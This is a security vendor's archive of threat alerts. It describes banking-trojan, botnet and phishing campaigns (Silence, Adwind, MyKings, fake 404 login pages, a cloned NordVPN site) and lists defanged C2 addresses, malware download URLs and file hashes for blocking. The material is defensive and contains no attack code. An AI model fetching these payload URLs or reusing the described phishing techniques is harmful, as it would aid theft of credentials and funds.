Archive for category Threats

Rewterz Threat Alert – Banks All over the World Attacked by Silence Advanced Hackers

Severity

High

Analysis Summary

Advance hacker group Silence has increased their activity significantly over the past year. Victims in the financial sector are scattered across more than 30 countries and financial losses have quintupled. Started in 2016, Silence group has attracted many eye balls after initial fail over their victims, since then it has managed to steal at least $4.2 million, initially from banks in the former Soviet Union, then from victims in Europe, Latin America, Africa, and Asia.

Tools and Tactics


The researchers say that Silence has improved its operational security and changed its toolset to thwart detection. Apart from rewriting the first-stage module (Silence.Downloader / Truebot), the group began using a PowerShell-based fileless loader called Ivoke.

For lateral movement in the victim network, a new PowerShell agent is used, called EmpireDNSAgent (EDA) because it is based on the recently abandoned Empire framework and the dnscat2 project.

In October 2018, Silence started to send out reconnaissance emails that would help better prepare an attack. Such a message would carry no payload and pretended to be an automated reply for a failed delivery.

Silence2_faildelivery_eml.png

The purpose was to receive an updated list of active email addresses from the target. Silence sent out over 170,000 of these emails during three separate campaigns against victims in Asia, Europe, and post-Soviet countries.

The recon campaign on financial institutions in Europe was the smallest one, with less than 10,000 emails delivered. The focus was on British financial companies.

Asia_TW_eng.jpg

After validating email addresses, the threat actor moves to the next stages of the attack and starts sending out messages with a payload that downloads Silence-specific malware.

Persistence and lateral movement follow, using self-developed tools or binaries already available on the target system.

In the final stage, the attacker reaches the card processing machines and can control ATMs using its Atmosphere trojan or a program called ‘xfs-disp.exe’ to dispense cash to money mules at specific times.

Impact

Financial loss

Remediation

  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/ attachments sent by unknown senders.

Rewterz Threat Alert – Adwind Bypasses Microsoft ATP to Attack Utilities Industry

Severity

Medium

Analysis Summary

A phishing campaign delivering Adwind (also known as JRAT or SockRat) to the utilities industry. The email attachment spoofs a PDF file but is actually the delivery mechanism for the notorious Adwind malware. The national grid utilities infrastructure is the primary target of the campaign. Adwind is designated as a MaaS (malware-as-a-service) and is available for use for a subscription fee. Its functions include taking screenshots, acquiring credentials from browsers (Chrome, IE, and Edge), webcam access, audio recording, file transfer, collecting system and user information, stealing VPN certificates, and a keylogger. The email is sent from a compromised account at Friary Shoes and requests the potential victim to open the PDF, sign it, and return the signed copy. The “attachment” looks like a PDF icon, but is actually a linked JPG that points to the initial payload. The payload is a JAR file, requiring Java to run. Clicking on the “attachment” begins the download and execution process. Once running, Adwind connects to its command and control server. Information harvested from the infected system is sent back to the CnC servers. Popular anti-virus software and analysis tools are disabled by using taskkill.exe.

Impact

Credential theft

Indicators of Compromise

IP(s) / Hostname(s)

  • 109[.]203[.]124[.]231
  • 194[.]5[.]97[.]28

Malware Hash (MD5/SHA1/SH256)

  • 0b7b52302c8c5df59d960dd97e3abdaf
  • 6b94046ac3ade886488881521bfce90f
  • 781fb531354d6f291f1ccab48da6d39f
  • 7f97f5f336944d427c03cc730c636b8f
  • a4e510d903f05892d77741c5f4d95b5d
  • c17b03d5a1f0dc6581344fd3d67d7be1

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.

Rewterz Threat ALert – MyKings Variant With Bootloader Persistence

Severity

High

Analysis Summary

Trend Micro published a blog post analyzing a variant of the MyKings botnet malware that includes a new bootloader persistence mechanism. The threat was originally detected through EternalBlue exploitation activity, which MyKings uses to propagate laterally. Upon install, the MyKings malware establishes persistence via several different methods, including through registry Run keys, scheduled tasks, and WMI objects. This most recent variant also expanded its persistence capabilities by adding a bootloader component. The bootkit alters kernel-level functions in order to ensure that the malicious code is executed on startup and that the difficulty of cleaning up the infection is greatly increased. The bootkit and other persistence mechanisms are used to perform a series of actions that eventually reach the goal of downloading additional payloads. One of the main payload types distributed by MyKings is cryptocurrency miners, which serve the purpose of providing a profit to the botnet operators.

Impact

Exposure of sensitive information

Indicators of Compromise

URLs

  • http[:]//js.mykings[.]top:280/helloworld[.]msi
  • hxxp[:]//js[.]mykings.top:280/v[.]sc

Malware Hash (MD5/SHA1/SH256)

  • e8ddefd237646a47debc01df9aa02fbcae40686f96b7860511c73798c7546201
  • 7a4f2f2702fababb0619556e67a41d0a09e01fbfdb84d47b4463decdbb360980
  • d5f907f9d2001ee5013c4c1af965467714bbc0928112e54ba35d142c8eab68bf
  • 790c213e1227adefd2d564217de86ac9fe660946e1240b5415c55770a951abfd
  • 80f8ba7992a5dbaa4a2f76263258d5d7bf3bb8994f9e8a4a5294f70ab8e38ea4
  • ab26a859633d1ec68e021226fab47870ed78fc2e6a58c70a7a7060be51247c1d
  • a3bb132ab1ba3e706b90d6fb514504105f174c4e444e87be7bce1995f798044d
  • 79bcb0b7ba00c4c65bf9b41cfe193fd917d92ab1d41456ac775836cec5cadc9a

Remediation

  • Block all threat indicators at your respective controls.
  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.

Rewterz Threat Intelligence Report 2019

Karachi, Pakistan – August 20, 2019 – Rewterz, a boutique information security company, today announced the release of the annual Threat Intelligence Report 2019. The report is compiled from data gathered through our advanced intelligence gathering platform that Rewterz has developed to identify cyberattacks. The report aims to provide the latest analysis of methods used by attackers to compromise data.

Rewterz Threat Intelligence Report 2019 includes findings of our Security Operation Center (SOC) teams that monitored and identified cyberattacks. Our team also analyzed global cyber security threats through our threat intelligence gathering platform to bring forth this valuable real-time data to equip organizations against cyberattacks beforehand. The impact of such attacks can be huge on an organization, ranging from disruption of critical operations to extreme financial losses. Therefore, to cope with growing techniques of cyber-crimes, our SOC team uses most advanced threat intelligence and manages the real-time data of threat landscape through our Security Orchestration Automation and Response (SOAR) platform, SIRP. Through this report, we aim to share and dissipate knowledge about sophisticated threats and advanced attacker practices in use on the Internet today. This report enables readers to gain clear insight on the nature of the threats currently faced by organizations operating in the cyber world.

Based on data collected from our attack sensors, the key findings of attacks towards Pakistan include:

  • The cyberspaces of USA and Russia are launching the highest number of cyberattacks.
  • 40% of the detected cyberattacks targeted Port 443 (HTTPS).
  • Most of the critical vulnerabilities were found in web servers.
  • Windows Installer Package MSI Execution was used to deploy highest number of different malware while WannaCry Ransomware continues to be the most used ransomware in cyberattacks.
  • About 40% of malicious emails are spam whereas 29% malicious emails attempt credential theft by redirecting to phishing sites.
  • Breaching of online transactions continues to be a major threat vector.
  • 28.9% of the cyberattacks are directed towards payment services.
  • Apache struts2 parameters interceptor Remote Command Execution was the most common exploit detected.
  • More than half of the web application attacks were that of Illegal Resource Access.

To view a full copy of the Rewterz Threat Intelligence 2019 report, please visit: Rewterz Threat Intelligence Report 2019


Rewterz Threat Advisory – Malicious Custom 404 Pages Used in Phishing Attacks

Severity

Medium

Analysis Summary

Microsoft security researchers discovered an unusual phishing campaign which employs custom 404 error pages to trick potential victims into handing out their Microsoft credentials.

To do this, the attackers register a domain and instead of creating a single phishing landing page to redirect their victims to, they configure a custom 404 page which shows the fake login form.

This allows the phishers to have an infinite amount of phishing landing pages URLs generated with the help of a single registered domain.

The 404 Not Found page tells you that you’ve hit a broken or dead link.

Phishing landing page

The custom 404 error pages these attackers use to harvest their victims’ credentials are perfectly camouflaged as legitimate Microsoft account sign-in pages, down to the smallest details.

All the links on the phishing page, including the ones at the bottom and the ones used to access one’s Microsoft account and to create a new one, are directing straight to official Microsoft login forms in an effort to make targets less suspicious.

The only elements missing from the phishing page are the “Sign-in options” link above the “Next” button and the cookies notification at the top of the page.

Impact

Credential theft

Affected Vendors

Microsoft

Remediation

  • Always be suspicious about emails sent by unknown senders.
  • Never click on the link/attachments sent by unknown senders.

Rewterz Threat Alert – Fake NordVPN Website Used by Hackers to Deliver Banking Trojan

Severity

Medium

Analysis Summary

Hackers actively distributing the bank Win32.Bolik.2 banking Trojan via the nord-vpn[.]club website, an almost perfect clone of the official nordvpn[.]com site used by the popular NordVPN VPN service.

Cloned NordVPN website

The cloned website also has a valid SSL certificate issued by open certificate authority Let’s Encrypt on August 3, with an expiration date of November 1. Win32.Bolik.2 trojan is an improved version of Win32.Bolik.1 and has qualities of a multicomponent polymorphic file virus.

Using this malware, hackers can perform web injections, traffic intercepts, keylogging and steal information from different bank-client systems.The operators behind this malicious campaign have launched their attacks on August 8, they are focusing on English-speaking targets and, according to the researchers, thousands have already visited the nord-vpn[.]club website in search of a download link for the NordVPN client.

A cocktail of banking trojans and information stealers—Win32.Bolik.2 and Trojan.PWS.Stealer.26645 (Predator The Thief)—was also delivered to their targets by the same hacker group behind this malware campaign with the help of two other cloned websites in late June 2019.

Impact

  • Web injections
  • Traffic intercepts
  • Keylogging
  • Information theft

Remediation

  • Always cross check files before downloading from internet.
  • Always scan your downloaded files before executing.

Copyright © Rewterz. All rights reserved.